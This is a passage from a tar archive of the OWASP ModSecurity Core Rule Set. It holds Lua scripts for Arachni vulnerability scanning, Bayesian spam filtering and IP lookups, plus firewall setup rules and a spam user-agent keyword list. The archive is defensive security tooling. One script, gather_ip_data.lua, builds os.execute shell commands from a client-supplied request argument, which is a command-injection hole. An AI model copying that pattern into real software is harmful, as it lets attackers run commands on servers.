{} for k,v in pairs(ARGS) do name = v["name"]; name = string.gsub(name, "ARGS:(.*)", "%1") value = v["value"]; m.log(4, "Arachni: Arg Name: " ..name.. " and Value: " ..value.. "."); args[name] = value end local yaml_args = yaml.dump ( args ) m.log(4, "Arachni: Updated ARGS table is: " .. yaml_args) -- -- Convert ModSecrity COOKIE data into a local table called cookies_table -- COOKIES = {} COOKIES = m.getvars("REQUEST_COOKIES") cookies_table = {} for k,v in pairs(COOKIES) do name = v["name"]; name = string.gsub(name, "REQUEST_COOKIES:(.*)", "%1") value = v["value"]; m.log(4, "Arachni: Cookie Name: " ..name.. " and Value: " ..value.. "."); cookies_table[name] = value end local yaml_cookies = yaml.dump ( cookies_table ) m.log(4, "Arachni: Updated Cookies table is: " .. yaml_cookies) -- -- Initiate Arachni RPC Dispatchers -- dispatcher = ArachniRPCClient:new( { host = arachni_host, port = 7331 } ) instance_info = dispatcher:call( 'dispatcher.dispatch' ) -- -- Check to see if we have previously initiated a scan for the resource -- -- If we have not, then we will contact the Dispatcher and start a scan -- local arachni_scan_initiated = m.getvar("RESOURCE.arachni_scan_initiated") if arachni_scan_initiated == nil then -- -- Set the host to match the remote Dispatcher -- instance = ArachniRPCClient:new({ host = arachni_host, port = instance_info.port, token = instance_info.token }) opts = { url = url_to_scan, audit_links = true, audit_forms = true, audit_cookies = true, -- only audit the stuff passed to vector feed link_count_limit = 0, cookies = cookies_table } instance:call( 'modules.load', { 'xss', 'sqli', 'path_traversal' } ) vectors = {} -- add a form var (for POST params) table.insert( vectors, { type = 'form', method = request_method, action = url_to_scan, inputs = args }) local yaml_vectors = yaml.dump( vectors ) m.log(4, "Arachni: Yaml output of vectors is: " .. yaml_vectors) plugins = { vector_feed = { vectors = vectors } } instance:call( 'plugins.load', plugins ) instance:call( 'opts.set', opts ) instance:call( 'framework.run' ) -- -- Save the Dispatcher port/token data to pull the report later -- m.setvar("RESOURCE.arachni_scan_initiated", "1") m.setvar("RESOURCE.arachni_instance_info_port", instance_info.port) m.setvar("RESOURCE.arachni_instance_info_token", instance_info.token) return ("Arachni: Scan Initiated. Exiting") else -- -- If we have previously initiated a scan, we will now check for a report -- m.log(4, "Arachni: Previous scan was initiated, checking scan status.") local instance_info_port = m.getvar("RESOURCE.arachni_instance_info_port") local instance_info_token = m.getvar("RESOURCE.arachni_instance_info_token") m.log(4, "Arachni: Port info: " .. instance_info_port .. " and Token info: " .. instance_info_token) instance = ArachniRPCClient:new({ host = arachni_host, port = instance_info_port, token = instance_info_token }) if instance:call( 'framework.busy?' ) then m.log(4, "Arachni: Scan still in progress, framework is busy. Exiting.") return ("Arachni scan still in progress, framework is busy. Exiting.") else m.log(4, "Arachni: Scan completed - calling for report.") local results = instance:call( 'framework.issues_as_hash' ) yaml_results = yaml.dump( results ) m.log(4, "Arachni: Yaml Results: " .. yaml_results) for k,v in pairs(results) do name = v["name"]; value = v["value"]; if ( v["mod_name"] == "XSS" ) then local XssVulnParams = m.getvar("RESOURCE.xss_vulnerable_params") if not (XssVulnParams) then m.log(4, "Arachni: Vulnerability Identified for Parameter: \"" .. v["var"] .. "\", Vulnerability Type: \"" .. v["mod_name"] .. "\"") m.setvar("RESOURCE.xss_vulnerable_params", v["var"]) else local CheckArgInXssVulnParams = string.find(XssVulnParams, v["var"]) if (CheckArgInXssVulnParams) then m.log(4, "Arachni: Arg Name: " .. v["var"] .. " already in XSS Vuln list.") else m.log(4, "Arachni: Vulnerability Identified for Parameter: \"" .. v["var"] .. "\", Vulnerability Type: \"" .. v["mod_name"] .. "\"") XssVulnParams = XssVulnParams .. ", " .. v["var"] m.setvar("RESOURCE.xss_vulnerable_params", XssVulnParams) end end end if ( v["mod_name"] == "SQLInjection" ) then local SQLiVulnParams = m.getvar("RESOURCE.sqli_vulnerable_params") if not (SQLiVulnParams) then m.log(4, "Arachni: Vulnerability Identified for Parameter: \"" .. v["var"] .. "\", Vulnerability Type: \"" .. v["mod_name"] .. "\"") m.setvar("RESOURCE.sqli_vulnerable_params", v["var"]) else local CheckArgInSQLiVulnParams = string.find(SQLiVulnParams, v["var"]) if (CheckArgInSQLiVulnParams) then m.log(4, "Arachni: Arg Name: " .. v["var"] .. " already in SQLi Vuln list.") else m.log(4, "Arachni: Vulnerability Identified for Parameter: \"" .. v["var"] .. "\", Vulnerability Type: \"" .. v["mod_name"] .. "\"") SQLiVulnParams = SQLiVulnParams .. ", " .. v["var"] m.setvar("RESOURCE.sqli_vulnerable_params", SQLiVulnParams) end end end end instance:call( 'service.shutdown' ) m.setvar("RESOURCE.arachni_scan_completed", "1") return ("Arachni: Done") end end end �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/bayes_check_spam.lua�����������������������������������0000775�0000000�0000000�00000004772�12164572564�0025305�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env lua require("io"); function table.val_to_str ( v ) if "string" == type( v ) then v = string.gsub( v, "\n", "\\n" ) if string.match( string.gsub(v,"[^'\"]",""), '^"+$' ) then return "'" .. v .. "'" end return '"' .. string.gsub(v,'"', '\\"' ) .. '"' else return "table" == type( v ) and table.tostring( v ) or tostring( v ) end end function table.key_to_str ( k ) if "string" == type( k ) and string.match( k, "^[_%a][_%a%d]*$" ) then return k else return "[" .. table.val_to_str( k ) .. "]" end end function table.tostring( tbl ) local result, done = {}, {} for k, v in ipairs( tbl ) do table.insert( result, table.val_to_str( v ) ) done[ k ] = true end for k, v in pairs( tbl ) do if not done[ k ] then table.insert( result, table.key_to_str( k ) .. "=" .. table.val_to_str( v ) ) end end return "{" .. table.concat( result, "," ) .. "}" end function main() local mf = require "moonfilter" -- define the classes to use mf.classes("/var/log/httpd/spam", "/var/log/httpd/ham") -- create ham+spam DB on disk -- this is only necessary the first time -- use command line moonfilter.lua to initially create the DBs outside -- of ModSecurity --mf.create() local anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none"); anomaly_score = tonumber(anomaly_score); if not (anomaly_score) then local score = "" local args = {}; args = m.getvars("ARGS", {"none"}); if (#args == "0") then m.log(4, "# of ARGS: " ..#args.. "."); return nil; end -- Place ARGS data into key/value pairs for inspection for k,v in pairs(args) do name = v["name"]; value = v["value"]; m.log(4, "Arg Name: " ..name.. " and Arg Value: " ..value.. "."); mf.text = value; local class_result = mf.classify() class_result = table.tostring(class_result) m.log(4, "Classify Results: " .. class_result .. ".") class = string.gsub(class_result, ".*class=\"(.*)\".*", "%1") if (class == "/var/log/httpd/spam") then score = string.gsub(class_result, ".*prob=(%d\.%d%d%d%d%d%d%d%d%d%d%d%d%d%d)\,.*", "%1") score = tonumber(score) if (score) then if (score > 0.90) then m.log(4, "Classify Results: " .. class .. ".") m.setvar("tx.bayes_score", class_result); m.setvar("tx.bayes_var_name", name); m.setvar("tx.bayes_var", value); return("Bayesian Analaysis Alert for " .. name .. " with payload: \"" .. value .. "\"") end end end end end return nil; end ������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/bayes_train_ham.lua������������������������������������0000775�0000000�0000000�00000001675�12164572564�0025151�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/lua require("io"); function main() local mf = require "moonfilter" -- define the classes to use mf.classes("/var/log/httpd/spam", "/var/log/httpd/ham") -- create ham+spam DB on disk -- this is only necessary the first time -- mf.create() local score = "" local value = "" local args = {}; args = m.getvars("ARGS", {"none"}); if (#args == 0) then m.log(4, "# of ARGS: " ..#args.. "."); return nil; end -- Place ARGS data into key/value pairs for inspection for k,v in pairs(args) do name = v["name"]; value = v["value"]; m.log(4, "Arg Name: " ..name.. " and Arg Value: " ..value.. "."); mf.text = value; local train_result = mf.train("/var/log/httpd/ham") end -- return nil; m.log(4, "Low Bayesian Score: " .. score .. ". Training payloads as non-malicious.") m.setvar("tx.bayes_msg", "Training payload as ham: " .. value .. "."); return ("Training payloads as non-malicious: " .. value .. "."); end �������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/bayes_train_spam.lua�����������������������������������0000775�0000000�0000000�00000003625�12164572564�0025341�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/lua require("io"); function table.val_to_str ( v ) if "string" == type( v ) then v = string.gsub( v, "\n", "\\n" ) if string.match( string.gsub(v,"[^'\"]",""), '^"+$' ) then return "'" .. v .. "'" end return '"' .. string.gsub(v,'"', '\\"' ) .. '"' else return "table" == type( v ) and table.tostring( v ) or tostring( v ) end end function table.key_to_str ( k ) if "string" == type( k ) and string.match( k, "^[_%a][_%a%d]*$" ) then return k else return "[" .. table.val_to_str( k ) .. "]" end end function table.tostring( tbl ) local result, done = {}, {} for k, v in ipairs( tbl ) do table.insert( result, table.val_to_str( v ) ) done[ k ] = true end for k, v in pairs( tbl ) do if not done[ k ] then table.insert( result, table.key_to_str( k ) .. "=" .. table.val_to_str( v ) ) end end return "{" .. table.concat( result, "," ) .. "}" end function main() local mf = require "moonfilter" -- define the classes to use mf.classes("/var/log/httpd/spam", "/var/log/httpd/ham") -- create ham+spam DB on disk -- this is only necessary the first time -- mf.create() local args = {}; args = m.getvars("MATCHED_VARS", {"none"}); if (#args == "0") then m.log(4, "# of ARGS: " ..#args.. "."); return nil; end -- Place ARGS data into key/value pairs for inspection for k,v in pairs(args) do name = v["name"]; value = v["value"]; m.log(4, "Arg Name: " ..name.. " and Arg Value: " ..value.. "."); mf.text = value; local train_result = mf.train("/var/log/httpd/spam") train_result = table.tostring(train_result) m.log(4, "Train Results: " .. train_result .. ".") m.setvar("tx.bayes_msg", "Completed Bayesian SPAM Training on Payload: " .. mf.text .. "."); return("Completed Bayesian SPAM Training on Payload: " .. mf.text .. "."); end return nil; end �����������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/gather_ip_data.lua�������������������������������������0000775�0000000�0000000�00000002162�12164572564�0024747�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/opt/local/bin/lua require("io"); function main() local anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none"); m.log(4, "Anomaly Score is: " .. anomaly_score .. "."); local remote_addr = m.getvar("ARGS.REMOTE_ADDR", "none"); m.log(4, "Remote IP is: " .. remote_addr .. "."); local ip_hostname = m.getvar("IP.HOSTNAME", "none"); if ((anomaly_score ~= nil) and (ip_hostname == nil)) then local hostname = "NONE"; local abuse_contact = "NONE"; n = os.tmpname () os.execute ("nslookup '" .. remote_addr .. "' > " .. n) os.execute ("whois '" .. remote_addr .. "' >> " .. n) for line in io.lines (n) do if string.match(line, "name = ") then hostname = line end if string.match(line, "abuse") then abuse_contact = line end end m.log(4, "Hostname is: " .. hostname .. "."); m.setvar("tx.hostname", hostname); m.log(4, "Abuse Contact is: " .. abuse_contact .. "."); m.setvar("tx.abuse_contact", abuse_contact); os.remove (n) return("Nslookup: " .. hostname .. " and WHOIS Abuse Info: " .. abuse_contact .. ""); end return nil; end ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/osvdb.lua����������������������������������������������0000775�0000000�0000000�00000001223�12164572564�0023126�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/opt/local/bin/lua local request_filename = m.getvar("REQUEST_FILENAME", "none") local args = {}; args = m.getvars("ARGS_NAMES", "none") function main () for line in io.lines("/usr/local/apache/conf/modsec_current/base_rules/vulnerabilities.txt") do if line:find(request_filename) then if string.find(line, "^%d+\,") then for k,v in pairs(args) do local arg_name = v["value"] .. "="; if string.find(line, arg_name) then m.setvar("resource.osvdb_check", "1") m.setvar("resource.osvdb_vulnerable", "1") m.setvar("tx.osvdb_msg", line) return(line) end end end end end m.setvar("resource.osvdb_check", "1") return nil end �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/profile_page_scripts.lua�������������������������������0000775�0000000�0000000�00000001643�12164572564�0026222�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/opt/local/bin/lua function main() local response_body = m.getvar("RESPONSE_BODY", "none"); if response_body ~= "" then local _, nscripts = string.gsub(response_body, "<script", ""); local _, niframes = string.gsub(response_body, "<iframe", ""); local _, nlinks = string.gsub(response_body, "a href", ""); local _, nimages = string.gsub(response_body, "<img", ""); if nscripts == nil then nscripts = 0 end if niframes == nil then niframes = 0 end if nlinks == nil then nlinks = 0 end if nimages == nil then nimages = 0 end m.log(3, "niframes[" .. niframes .. "]"); m.setvar("tx.niframes", niframes); m.log(3, "nscripts[" .. nscripts .. "]"); m.setvar("tx.nscripts", nscripts); m.log(3, "nlinks[" .. nlinks .. "]"); m.setvar("tx.nlinks", nlinks); m.log(3, "nimages[" .. nimages .. "]"); m.setvar("tx.nimages", nimages); return nil; end return nil; end ���������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/modsecurity_crs_10_setup.conf.example����������������������0000664�0000000�0000000�00000032722�12164572564�0027771�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -- [[ Recommended Base Configuration ]] ------------------------------------------------- # # The configuration directives/settings in this file are used to control # the OWASP ModSecurity CRS. These settings do **NOT** configure the main # ModSecurity settings such as: # # - SecRuleEngine # - SecRequestBodyAccess # - SecAuditEngine # - SecDebugLog # # You should use the modsecurity.conf-recommended file that comes with the # ModSecurity source code archive. # # Ref: https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended # # # -- [[ Rule Version ]] ------------------------------------------------------------------- # # Rule version data is added to the "Producer" line of Section H of the Audit log: # # - Producer: ModSecurity for Apache/2.7.0-rc1 (http://www.modsecurity.org/); OWASP_CRS/2.2.4. # # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature # SecComponentSignature "OWASP_CRS/2.2.8" # # -- [[ Modes of Operation: Self-Contained vs. Collaborative Detection ]] ----------------- # # Each detection rule uses the "block" action which will inherit the SecDefaultAction # specified below. Your settings here will determine which mode of operation you use. # # -- [[ Self-Contained Mode ]] -- # Rules inherit the "deny" disruptive action. The first rule that matches will block. # # -- [[ Collaborative Detection Mode ]] -- # This is a "delayed blocking" mode of operation where each matching rule will inherit # the "pass" action and will only contribute to anomaly scores. Transactional blocking # can be applied # # -- [[ Alert Logging Control ]] -- # You have three options - # # - To log to both the Apache error_log and ModSecurity audit_log file use: "log" # - To log *only* to the ModSecurity audit_log file use: "nolog,auditlog" # - To log *only* to the Apache error_log file use: "log,noauditlog" # # Ref: http://blog.spiderlabs.com/2010/11/advanced-topic-of-the-week-traditional-vs-anomaly-scoring-detection-modes.html # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecDefaultAction # SecDefaultAction "phase:1,deny,log" # # -- [[ Collaborative Detection Severity Levels ]] ---------------------------------------- # # These are the default scoring points for each severity level. You may # adjust these to you liking. These settings will be used in macro expansion # in the rules to increment the anomaly scores when rules match. # # These are the default Severity ratings (with anomaly scores) of the individual rules - # # - 2: Critical - Anomaly Score of 5. # Is the highest severity level possible without correlation. It is # normally generated by the web attack rules (40 level files). # - 3: Error - Anomaly Score of 4. # Is generated mostly from outbound leakage rules (50 level files). # - 4: Warning - Anomaly Score of 3. # Is generated by malicious client rules (35 level files). # - 5: Notice - Anomaly Score of 2. # Is generated by the Protocol policy and anomaly files. # SecAction \ "id:'900001', \ phase:1, \ t:none, \ setvar:tx.critical_anomaly_score=5, \ setvar:tx.error_anomaly_score=4, \ setvar:tx.warning_anomaly_score=3, \ setvar:tx.notice_anomaly_score=2, \ nolog, \ pass" # # -- [[ Collaborative Detection Scoring Initialization and Threshold Levels ]] ------------------------------ # # These variables are used in macro expansion in the 49 inbound blocking and 59 # outbound blocking files. # # **MUST HAVE** ModSecurity v2.5.12 or higher to use macro expansion in numeric # operators. If you have an earlier version, edit the 49/59 files directly to # set the appropriate anomaly score levels. # # You should set the score level (rule 900003) to the proper threshold you # would prefer. If set to "5" it will work similarly to previous Mod CRS rules # and will create an event in the error_log file if there are any rules that # match. If you would like to lessen the number of events generated in the # error_log file, you should increase the anomaly score threshold to something # like "20". This would only generate an event in the error_log file if there # are multiple lower severity rule matches or if any 1 higher severity item matches. # SecAction \ "id:'900002', \ phase:1, \ t:none, \ setvar:tx.anomaly_score=0, \ setvar:tx.sql_injection_score=0, \ setvar:tx.xss_score=0, \ setvar:tx.inbound_anomaly_score=0, \ setvar:tx.outbound_anomaly_score=0, \ nolog, \ pass" SecAction \ "id:'900003', \ phase:1, \ t:none, \ setvar:tx.inbound_anomaly_score_level=5, \ setvar:tx.outbound_anomaly_score_level=4, \ nolog, \ pass" # # -- [[ Collaborative Detection Blocking ]] ----------------------------------------------- # # This is a collaborative detection mode where each rule will increment an overall # anomaly score for the transaction. The scores are then evaluated in the following files: # # Inbound anomaly score - checked in the modsecurity_crs_49_inbound_blocking.conf file # Outbound anomaly score - checked in the modsecurity_crs_59_outbound_blocking.conf file # # If you want to use anomaly scoring mode, then uncomment this line. # #SecAction \ "id:'900004', \ phase:1, \ t:none, \ setvar:tx.anomaly_score_blocking=on, \ nolog, \ pass" # # -- [[ GeoIP Database ]] ----------------------------------------------------------------- # # There are some rulesets that need to inspect the GEO data of the REMOTE_ADDR data. # # You must first download the MaxMind GeoIP Lite City DB - # # http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz # # You then need to define the proper path for the SecGeoLookupDb directive # # Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html # Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html # #SecGeoLookupDb /opt/modsecurity/lib/GeoLiteCity.dat # # -- [[ Regression Testing Mode ]] -------------------------------------------------------- # # If you are going to run the regression testing mode, you should uncomment the # following rule. It will enable DetectionOnly mode for the SecRuleEngine and # will enable Response Header tagging so that the client testing script can see # which rule IDs have matched. # # You must specify the your source IP address where you will be running the tests # from. # #SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \ "id:'900005', \ phase:1, \ t:none, \ ctl:ruleEngine=DetectionOnly, \ setvar:tx.regression_testing=1, \ nolog, \ pass" # # -- [[ HTTP Policy Settings ]] ---------------------------------------------------------- # # Set the following policy settings here and they will be propagated to the 23 rules # file (modsecurity_common_23_request_limits.conf) by using macro expansion. # If you run into false positives, you can adjust the settings here. # # Only the max number of args is uncommented by default as there are a high rate # of false positives. Uncomment the items you wish to set. # # # -- Maximum number of arguments in request limited SecAction \ "id:'900006', \ phase:1, \ t:none, \ setvar:tx.max_num_args=255, \ nolog, \ pass" # # -- Limit argument name length #SecAction \ "id:'900007', \ phase:1, \ t:none, \ setvar:tx.arg_name_length=100, \ nolog, \ pass" # # -- Limit value name length #SecAction \ "id:'900008', \ phase:1, \ t:none, \ setvar:tx.arg_length=400, \ nolog, \ pass" # # -- Limit arguments total length #SecAction \ "id:'900009', \ phase:1, \ t:none, \ setvar:tx.total_arg_length=64000, \ nolog, \ pass" # # -- Individual file size is limited #SecAction \ "id:'900010', \ phase:1, \ t:none, \ setvar:tx.max_file_size=1048576, \ nolog, \ pass" # # -- Combined file size is limited #SecAction \ "id:'900011', \ phase:1, \ t:none, \ setvar:tx.combined_file_sizes=1048576, \ nolog, \ pass" # # Set the following policy settings here and they will be propagated to the 30 rules # file (modsecurity_crs_30_http_policy.conf) by using macro expansion. # If you run into false positves, you can adjust the settings here. # SecAction \ "id:'900012', \ phase:1, \ t:none, \ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS', \ setvar:'tx.allowed_request_content_type=application/x-www-form-urlencoded|multipart/form-data|text/xml|application/xml|application/x-amf|application/json', \ setvar:'tx.allowed_http_versions=HTTP/0.9 HTTP/1.0 HTTP/1.1', \ setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/', \ setvar:'tx.restricted_headers=/Proxy-Connection/ /Lock-Token/ /Content-Range/ /Translate/ /via/ /if/', \ nolog, \ pass" # # -- [[ Content Security Policy (CSP) Settings ]] ----------------------------------------- # # The purpose of these settings is to send CSP response headers to # Mozilla FireFox users so that you can enforce how dynamic content # is used. CSP usage helps to prevent XSS attacks against your users. # # Reference Link: # # https://developer.mozilla.org/en/Security/CSP # # Uncomment this SecAction line if you want use CSP enforcement. # You need to set the appropriate directives and settings for your site/domain and # and activate the CSP file in the experimental_rules directory. # # Ref: http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html # #SecAction \ "id:'900013', \ phase:1, \ t:none, \ setvar:tx.csp_report_only=1, \ setvar:tx.csp_report_uri=/csp_violation_report, \ setenv:'csp_policy=allow \'self\'; img-src *.yoursite.com; media-src *.yoursite.com; style-src *.yoursite.com; frame-ancestors *.yoursite.com; script-src *.yoursite.com; report-uri %{tx.csp_report_uri}', \ nolog, \ pass" # # -- [[ Brute Force Protection ]] --------------------------------------------------------- # # If you are using the Brute Force Protection rule set, then uncomment the following # lines and set the following variables: # - Protected URLs: resources to protect (e.g. login pages) - set to your login page # - Burst Time Slice Interval: time interval window to monitor for bursts # - Request Threshold: request # threshold to trigger a burst # - Block Period: temporary block timeout # #SecAction \ "id:'900014', \ phase:1, \ t:none, \ setvar:'tx.brute_force_protected_urls=#/login.jsp# #/partner_login.php#', \ setvar:'tx.brute_force_burst_time_slice=60', \ setvar:'tx.brute_force_counter_threshold=10', \ setvar:'tx.brute_force_block_timeout=300', \ nolog, \ pass" # # -- [[ DoS Protection ]] ---------------------------------------------------------------- # # If you are using the DoS Protection rule set, then uncomment the following # lines and set the following variables: # - Burst Time Slice Interval: time interval window to monitor for bursts # - Request Threshold: request # threshold to trigger a burst # - Block Period: temporary block timeout # #SecAction \ "id:'900015', \ phase:1, \ t:none, \ setvar:'tx.dos_burst_time_slice=60', \ setvar:'tx.dos_counter_threshold=100', \ setvar:'tx.dos_block_timeout=600', \ nolog, \ pass" # # -- [[ Check UTF enconding ]] ----------------------------------------------------------- # # We only want to apply this check if UTF-8 encoding is actually used by the site, otherwise # it will result in false positives. # # Uncomment this line if your site uses UTF8 encoding #SecAction \ "id:'900016', \ phase:1, \ t:none, \ setvar:tx.crs_validate_utf8_encoding=1, \ nolog, \ pass" # # -- [[ Enable XML Body Parsing ]] ------------------------------------------------------- # # The rules in this file will trigger the XML parser upon an XML request # # Initiate XML Processor in case of xml content-type # SecRule REQUEST_HEADERS:Content-Type "text/xml" \ "id:'900017', \ phase:1, \ t:none,t:lowercase, \ nolog, \ pass, \ chain" SecRule REQBODY_PROCESSOR "!@streq XML" \ "ctl:requestBodyProcessor=XML" # # -- [[ Global and IP Collections ]] ----------------------------------------------------- # # Create both Global and IP collections for rules to use # There are some CRS rules that assume that these two collections # have already been initiated. # SecRule REQUEST_HEADERS:User-Agent "^(.*)$" \ "id:'900018', \ phase:1, \ t:none,t:sha1,t:hexEncode, \ setvar:tx.ua_hash=%{matched_var}, \ nolog, \ pass" SecRule REQUEST_HEADERS:x-forwarded-for "^\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\b" \ "id:'900019', \ phase:1, \ t:none, \ capture, \ setvar:tx.real_ip=%{tx.1}, \ nolog, \ pass" SecRule &TX:REAL_IP "!@eq 0" \ "id:'900020', \ phase:1, \ t:none, \ initcol:global=global, \ initcol:ip=%{tx.real_ip}_%{tx.ua_hash}, \ nolog, \ pass" SecRule &TX:REAL_IP "@eq 0" \ "id:'900021', \ phase:1, \ t:none, \ initcol:global=global, \ initcol:ip=%{remote_addr}_%{tx.ua_hash}, \ setvar:tx.real_ip=%{remote_addr}, \ nolog, \ pass" ����������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/��������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0023563�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_42_comment_spam.data������������0000664�0000000�0000000�00000000750�12164572564�0032036�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������super happy fun psycheclone grub crawler core-project/ winnie poh mozilla/4.0+( email siphon internet explorer nutscrape/ mozilla/4.0( missigua libwww-perl movable type user blogsearchbot-martin emailsiphon digger 8484 boston project nutchcvs pycurl java 1. isc systems irc emailcollector mj12bot/v1.0.8 trackback/ microsoft url diamond autoemailspider lwp pussycat jakarta commons java/1. user-agent: <sc adwords omniexplorer wordpress httpproxy user agent: ecollector msie cherrypicker ������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_10_ignore_static.conf�������0000664�0000000�0000000�00000004362�12164572564�0033067�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # The rules in this file will cause ModSecurity to let requests for static # content go into the server without being examined (mostly media content). # This can reduce the load on the server considerably. # # This ruleset will skip all tests for media files, but will skip only the # request body phase (phase 2) for text files. To skip the outbound stage # for text files, add file 47 (skip_outbound_checks) to your configuration, # in addition to this file # # NOTE If you are using mod_rewrite to rewrite URLs, please keep in mind # that some URLs may seem static, when they are not. for example, # if you have a rule like this in your configuration: # RewriteRule (.*).gif images.php?id=$1 [QSA] # then requests to the gif files will pass through ModSecurity without # inspection. # # We skip inspection GET & HEAD requests that have no parameters # and that end with static content file extension SecRule REQUEST_METHOD "^(?:GET|HEAD)$" "chain,phase:2,t:none,skip:1,pass,nolog,id:'900040',severity:'6'" SecRule &ARGS "@eq 0" "t:none,setvar:tx.no_parameters=1" SecAction "phase:2,id:'900041',t:none,nolog,pass,skipAfter:END_STATIC_CONTENT_CHECK" # Determine actions based on static file extensions # Images SecRule REQUEST_FILENAME "\.(?:(?:jpe?|pn)g|gif|ico)$" "phase:2,t:none,t:lowercase,allow,nolog,id:'900042',severity:'6'" # Documents SecRule REQUEST_FILENAME "\.(?:doc|pdf|txt|xls)$" "phase:2,t:none,t:lowercase,setvar:tx.text_file_extension=1,allow:phase,nolog,id:'900043',severity:'6'" # HTML SecRule REQUEST_FILENAME "\.(?:(?:cs|j)s|html?)$" "phase:2,t:none,t:lowercase,setvar:tx.text_file_extension=1,allow:phase,nolog,id:'999005',severity:'6'" # Media files SecRule REQUEST_FILENAME "\.(?:mp(?:e?g|3)|avi|flv|swf|wma)$" "phase:2,t:none,t:lowercase,allow,nolog,id:'999006',severity:'6'" SecMarker END_STATIC_CONTENT_CHECK ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_11_avs_traffic.conf���������0000664�0000000�0000000�00000002632�12164572564�0032523�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset allows you to control how ModSecurity will handle traffic originating # from Authorized Vulnerability Scanning (AVS) sources. # See related blog post - # http://blog.spiderlabs.com/2010/12/advanced-topic-of-the-week-handling-authorized-scanning-traffic.html # # # White-list ASV network block (no blocking or logging of AVS traffic) # Update IP network block as appropriate for your AVS traffic #SecRule REMOTE_ADDR "@beginsWith 192.168.1." "phase:1,id:'981033',t:none,nolog,pass,allow" # # Recommended "Block but Don't Log" rule for scanning traffic # Update IP address/network block as appropriate for your ASV traffic #SecRule REMOTE_ADDR "@streq 192.168.1.101" "phase:1,id:'981034',t:none,nolog,pass,ctl:auditEngine=Off" # Recommended phase 3 rule that will 